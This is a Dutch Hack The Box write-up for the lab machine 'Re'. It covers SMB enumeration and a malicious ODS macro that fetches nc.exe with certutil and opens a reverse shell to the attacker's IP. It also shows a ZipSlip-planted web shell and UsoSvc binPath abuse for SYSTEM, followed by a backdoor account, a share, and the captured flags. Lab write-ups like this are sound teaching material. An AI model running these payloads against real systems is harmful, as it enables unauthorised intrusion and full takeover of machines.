htb-re-nl

Zoals altijd eerst een nmap scan

root@kali:~/htb/re# nmap -p- -sT -oN nmapscan 10.10.10.144
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-20 03:27 EST
Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 14.92% done; ETC: 03:30 (0:02:23 remaining)
Nmap scan report for 10.10.10.144
Host is up (0.029s latency).
Not shown: 65533 filtered ports
PORT    STATE SERVICE
80/tcp  open  http
445/tcp open  microsoft-ds

Ik vond de shares met behulp van

root@kali:~/htb/re# smbmap -H 10.10.10.144 -u guest -p ''
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.144...
[+] IP: 10.10.10.144:445 Name: reblog.htb 
Disk Permissions
---- -----------
IPC$ READ ONLY
malware_dropbox READ ONLY

vervolgens las ik de reblog.htb, en heb daarna een malicious odt file geupload, larer bleek dat het een ods file moest zijn.

In metasploit is er een exploit die zou moeten werken :

exploit/multi/misc/openoffice_document_macro

We hernoemen het verkregen bestand naar zip, en bewerken deze door de payload te vervangen door   :

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE script:module PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "module.dtd"> <script:module xmlns:script="http://openoffice.org/2000/script" script:name="Module1" script:language="StarBasic"> Sub OnLoad Shell(&quot;certutil.exe -urlcache -split -f 'http://10.10.14.7/nc.exe' C:\Windows\System32\spool\drivers\color\nc.exe&quot;) Shell(&quot;C:\Windows\System32\spool\drivers\color\nc.exe 10.10.14.7 1111 -e cmd.exe&quot;) End Sub </script:module>
Daarna sla ik het aangepaste bestand op als ods file ipv zip
root@kali:~/htb/re# smbclient //reblog.htb/"malware_dropbox" -u blah
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 22 02:19:02 2020
.. D 0 Wed Jan 22 02:19:02 2020

8247551 blocks of size 4096. 4294559 blocks available
smb: \> put puckiestyle.odt
putting file puckiestyle.odt as \puckiestyle.odt (28.8 kb/s) (average 28.8 kb/s)
smb: \>
root@kali:~/htb# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.144 - - [22/Jan/2020 04:03:03] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.144 - - [22/Jan/2020 04:03:04] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.144 - - [22/Jan/2020 04:03:53] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.144 - - [22/Jan/2020 04:03:53] "GET /nc.exe HTTP/1.1" 200 -


root@kali:~/htb/re# smbclient //reblog.htb/"malware_dropbox" -u blah
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 22 04:59:00 2020
  ..                                  D        0  Wed Jan 22 04:59:00 2020

		8247551 blocks of size 4096. 4294527 blocks available
smb: \> put facelesscoder.ods
putting file facelesscoder.ods as \facelesscoder.ods (28.0 kb/s) (average 28.0 kb/s)
smb: \> put facelesscoder.ods
putting file facelesscoder.ods as \facelesscoder.ods (28.1 kb/s) (average 28.1 kb/s)
smb: \> 

hier is mijn gebruikte odt/ods bestand https://github.com/puckiestyle/pentest/blob/master/puckiestyle.ods.zip

 root@kali:~# rlwrap nc -nlvp 1111
listening on [any] 1111 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.144] 49675
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files\LibreOffice\program>whoami
whoami
re\luke

C:\Program Files\LibreOffice\program>
c:\Users\luke\Desktop>type user.txt
type user.txt
FE41736F5B9311E48E48B520D9F384D3

.

ZipSlip archie maken

Ik maakt een zipslip, door eerst in mijn kali box folders aan te maken \inetpub\wwwroot\blog

vervolgens copieerde ik hier puckieshell.ods hierheen

toen maakt ik het zipslip met

root@kali:/HTB/RE# zip temp.zip ../../../../../../../../inetpub/wwwroot/blog/puckieshell.aspx
 adding ../../../../../../../../inetpub/wwwroot/blog/puckieshell.aspx (      deflated 75%)

upload vervolgens dit zipslip.zip naar ods folder for analyse door vulerable WinRAR

c:\Users\luke\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is 4638-2C29

Directory of c:\Users\luke\Documents

06/18/2019 01:05 PM <DIR> .
06/18/2019 01:05 PM <DIR> ..
01/22/2020 03:28 AM <DIR> malware_dropbox
01/22/2020 03:28 AM <DIR> malware_process
01/22/2020 03:46 AM <DIR> ods
06/18/2019 09:30 PM 1,096 ods.yara
06/18/2019 09:33 PM 1,783 process_samples.ps1
03/13/2019 05:47 PM 1,485,312 yara64.exe
3 File(s) 1,488,191 bytes
5 Dir(s) 17,559,576,576 bytes free

c:\Users\luke\Documents>whoami
whoami
re\luke

c:\Users\luke\Documents>certutil -urlcache -split -f "http://10.10.14.7/puckiestyle.zip" "c:\Users\luke\Documents\ods\runme.rar"
certutil -urlcache -split -f "http://10.10.14.7/puckiestyle.zip" "c:\Users\luke\Documents\ods\runme.rar"
****  Online  ****
  0000  ...
  322f
CertUtil: -URLCache command completed successfully.

root@kali:~/htb# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.144 - - [22/Jan/2020 08:16:30] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.144 - - [23/Jan/2020 04:00:25] "GET /puckiestyle.zip HTTP/1.1" 200 -

`vervolgens opende ik de browser  en ging naar de shell

Ik maakte eerst een folder c:\temp om daar mijn bestanden neer te zetten. En vervolgens starte ik een netcat sessie

root@kali:~/htb/re# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.144] 49734
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot\blog>whoami
whoami
iis apppool\reblog
c:\Program Files\Sysinternals>accesschk -accepteula -uvwc * > c:\temp\accesscheck.txt
accesschk -accepteula -uvwc * > c:\temp\accesscheck.txt

Accesschk v6.12 - Reports effective permissions for securable objects
Copyright (C) 2006-2017 Mark Russinovich
Sysinternals - www.sysinternals.com

vervolgens ontdekte ik in accesscheck.txt dat NT AUTHORITY\SERVICE ook RW access had op UsoSvc

c:\Program Files\Sysinternals>type c:\temp\accesscheck.txt
-knip-
UserManager
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
UsoSvc
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW NT AUTHORITY\SERVICE
SERVICE_ALL_ACCESS
VaultSvc

Voor PrivEsc heb ik de usosvc gebruikt. ( eerst current bin path controleren, en daarna aanpassen, en als laatste de usosvc service stoppen en starten )

C:\inetpub\wwwroot\blog>sc config usosvc binPath="C:\temp\nc.exe 10.10.14.7 53 -e cmd"
sc config usosvc binPath="C:\temp\nc.exe 10.10.14.7 53 -e cmd"
[SC] ChangeServiceConfig SUCCESS

C:\inetpub\wwwroot\blog>reg query "HKLM\System\CurrentControlSet\Services\usosvc" /v "ImagePath"
reg query "HKLM\System\CurrentControlSet\Services\usosvc" /v "ImagePath"

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\usosvc
ImagePath REG_EXPAND_SZ C:\temp\nc.exe 10.10.14.7 53 -e cmd


C:\inetpub\wwwroot\blog>net stop usosvc
net stop usosvc
The Update Orchestrator Service service is not started.

More help is available by typing NET HELPMSG 3521.


C:\inetpub\wwwroot\blog>net start usosvc
net start usosvc
The service is not responding to the control function.

More help is available by typing NET HELPMSG 2186.


C:\inetpub\wwwroot\blog>


root@kali:~/htb/re# rlwrap nc -nlvp 53
listening on [any] 53 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.144] 49735
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>net user coby IEstyle
net user coby IEstyle
The command completed successfully.

C:\Windows\system32>net share root=C:\Users\administrator\desktop /grant:everyone,FULL
C:\Windows\system32>net use z: \\127.0.0.1\root /user:coby IEstyle
net use z: \\127.0.0.1\root /user:coby IEstyle
The command completed successfully.

C:\Windows\system32>z:
z:

Z:\>dir
dir
Volume in drive Z has no label.
Volume Serial Number is 4638-2C29

Directory of Z:\

04/14/2019 11:35 AM <DIR> .
04/14/2019 11:35 AM <DIR> ..
03/27/2019 05:37 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 17,572,204,544 bytes free

Z:\>type root.txt
type root.txt
1B4FB905423F4AD8D99C731468F7715D

Z:\>

het kan ook ipv met netcat met PowerUp
Invoke-ServiceAbuse -Name "UsoSvc" -Command "\users\public\downloads\nc.exe 10.10.14.7 53 -e cmd"

Auteur : Puckiestyle

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *